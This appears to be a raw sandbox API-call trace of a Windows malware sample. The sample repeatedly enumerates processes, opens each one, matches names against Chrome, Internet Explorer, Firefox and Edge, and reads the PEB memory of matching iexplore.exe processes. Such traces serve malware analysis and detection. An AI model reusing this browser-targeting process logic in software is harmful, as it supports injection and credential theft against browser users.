	[0200.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.368] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.369] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0200.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.369] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0200.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1c18
	[0200.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.370] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0200.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.370] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.371] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0200.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.371] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0200.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1c1c
	[0200.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.372] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0200.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.373] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.373] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0200.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.374] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.374] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0200.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1c20
	[0200.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.375] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0200.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.375] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.375] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0200.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.376] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.376] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0200.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1c24
	[0200.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.377] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0200.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.377] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.377] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0200.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.378] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.378] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0200.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1c28
	[0200.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.379] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0200.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.379] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.380] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0200.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.380] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.381] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0200.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1c2c
	[0200.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.381] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0200.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.382] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.382] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0200.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.382] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.383] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0200.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1c30
	[0200.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.383] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0200.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.384] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.384] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0200.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.384] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.384] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0200.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1c34
	[0200.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.385] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0200.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.386] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.386] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0200.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.387] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.387] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0200.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1c38
	[0200.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.388] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0200.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.388] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.389] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0200.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.389] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.390] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0200.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1c3c
	[0200.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.391] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0200.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.391] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.392] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0200.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.392] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.392] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0200.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1c40
	[0200.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.393] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0200.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.394] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.394] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0200.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.395] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.395] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0200.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1c44
	[0200.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.396] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0200.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.397] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.397] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0200.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.398] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.398] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1c48
	[0200.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.399] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.399] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.399] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.400] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.400] NtQueryInformationProcess (in: ProcessHandle=0x1c48, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.400] ReadProcessMemory (in: hProcess=0x1c48, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.400] ReadProcessMemory (in: hProcess=0x1c48, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.400] ReadProcessMemory (in: hProcess=0x1c48, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.400] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.400] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1c4c
	[0200.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.401] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.402] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.402] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.402] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.402] NtQueryInformationProcess (in: ProcessHandle=0x1c4c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.402] ReadProcessMemory (in: hProcess=0x1c4c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.402] ReadProcessMemory (in: hProcess=0x1c4c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.402] ReadProcessMemory (in: hProcess=0x1c4c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.403] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.403] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1c50
	[0200.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.404] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.404] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.404] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.404] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0200.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1c54
	[0200.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.405] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0200.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.406] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.406] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0200.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.406] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1c58
	[0200.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.407] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.408] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.408] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.408] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.409] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.409] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0200.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1c5c
	[0200.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.410] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.410] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.411] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.411] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1c60
	[0200.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.412] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.412] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.413] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.413] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0200.418] CloseHandle (hObject=0x188) returned 1
	[0200.418] Sleep (dwMilliseconds=0x64) 
	[0200.523] GetCurrentProcessId () returned 0x110
	[0200.523] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0200.525] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0200.526] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0200.527] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0200.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1c64
	[0200.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.527] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.528] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.528] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.528] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.529] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1c68
	[0200.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.529] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.530] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.530] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.530] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
